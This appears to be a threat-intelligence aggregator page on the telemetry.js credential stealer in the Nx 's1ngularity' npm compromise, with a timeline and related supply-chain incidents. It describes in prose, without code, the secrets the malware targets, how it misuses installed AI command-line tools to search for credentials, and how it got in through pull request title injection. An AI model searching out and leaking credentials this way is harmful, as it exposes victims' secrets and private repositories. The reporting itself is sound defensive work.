Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Telemetry.js credential stealer targeting Linux and macOS with public GitHub exfiltration

Malware Activity
First reported
Last updated
Happening score
H score 34
1 unique sources, 1 articles

Summary

Hide ▲

The telemetry.js credential stealer is targeting Linux and macOS systems and trying to harvest GitHub tokens, npm tokens, SSH keys, .env files, and crypto wallets, increasing the risk of secret theft and repository exposure. The malware also uses installed AI command-line tools such as Claude, Q, and Gemini to search for credentials with prompt-driven queries. Stolen secrets were uploaded to public GitHub repositories named s1ngularity-repository, widening exposure after the initial compromise.

Related Happenings

Lightning PyPI router_runtime.js credential-stealing payload

Malware Activity
First: 30.04.2026 19:31 Last: 30.04.2026 19:31 Sources 1

About this happening: The **Lightning** PyPI package was pushed in **malicious versions 2.6.2 and 2.6.3** on **April 30, 2026**, turning a normal install into **credential theft** for **developer and C...

Latest development: 04.05.2026 20:15

Microsoft Threat Intelligence says Defender detected and prevented the malicious `lightning==2.6.3` routine in customer environments, notified the Lightning maintainer, and warned that users who ran `import lightning` may need to rotate exposed secrets, keys, and tokens.

Open Happening

Ghost campaign malicious npm package operation

Campaign
First: 24.03.2026 14:00 Last: 24.03.2026 14:00 Sources 1

About this happening: The **Ghost campaign** is pushing **malicious npm packages** that steal **sudo/root credentials** and enable wallet-targeting payloads, raising risk for developers using the **Nod...

Open Happening

GhostLoader staged npm install payload activity

Malware Activity
First: 24.03.2026 14:00 Last: 24.03.2026 14:00 Sources 1

About this happening: **GhostLoader** is now being delivered through **staged npm install scripts**, turning routine package installation into a route for **data theft** and **cryptocurrency wallet** t...

Open Happening

Vidar Stealer 2.0 fake game-cheat distribution

Malware Activity
First: 18.03.2026 13:15 Last: 18.03.2026 13:15 Sources 1

About this happening: The **Vidar Stealer 2.0** malware is being spread through **fake game-cheat repositories** and **Reddit lures**, putting players seeking cheats for major online games at risk of *...

Open Happening

Github[.]com/xinfeisoft/crypto supply-chain malware activity delivering Rekoobe

Malware Activity
First: 27.02.2026 17:33 Last: 27.02.2026 17:33 Sources 1

About this happening: The **malicious Go module github[.]com/xinfeisoft/crypto** has been identified as a **supply-chain malware package** that steals terminal passwords and delivers **Rekoobe** on **L...

Open Happening

Timeline

  1. 06.09.2025 17:11 1 articles · 8mo ago

    Nx GitHub Actions compromise publishes telemetry.js on NPM

    Exploitation Observed

    Attackers exploited a flawed GitHub Actions workflow in the Nx repository to publish a malicious NPM package that included telemetry.js, a post-install credential stealer targeting Linux and macOS systems and trying to steal GitHub tokens, npm tokens, SSH keys, .env files, and crypto wallets for upload to public GitHub repositories named "s1ngularity-repository."

    Show sources
    Open in new tab
  2. 06.09.2025 17:11 1 articles · 8mo ago

    Leaked GitHub tokens expose private repositories as public s1ngularity copies

    Campaign Scope Update

    Attackers used leaked GitHub tokens to flip private repositories to public and rename them to include the "s1ngularity" string, expanding the blast radius to another 480 accounts and 6,700 private repositories.

    Show sources
    Open in new tab
  3. 06.09.2025 17:11 1 articles · 8mo ago

    Compromised accounts publish private repositories from a single victim organization

    Victim Impact Update

    On August 31, 2025, two compromised accounts were used against a single victim organization to publish an additional 500 private repositories, extending the exposure created by the earlier token theft and public-repository conversion.

    Show sources
    Open in new tab
  4. 06.09.2025 17:11 2 articles · 8mo ago

    Wiz quantifies the Nx s1ngularity fallout and Nx hardens publishing controls

    Technical Analysis Update

    Wiz's post-incident evaluation says the Nx compromise exposed 2,180 accounts and 7,200 repositories across three distinct phases, and many leaked secrets remain valid. The Nx team says the compromise came from pull request title injection combined with insecure use of pull_request_target, then removed the malicious packages, revoked and rotated the compromised tokens, adopted NPM's Trusted Publisher model, and added manual approval for PR-triggered workflows.

    Show sources
    Open in new tab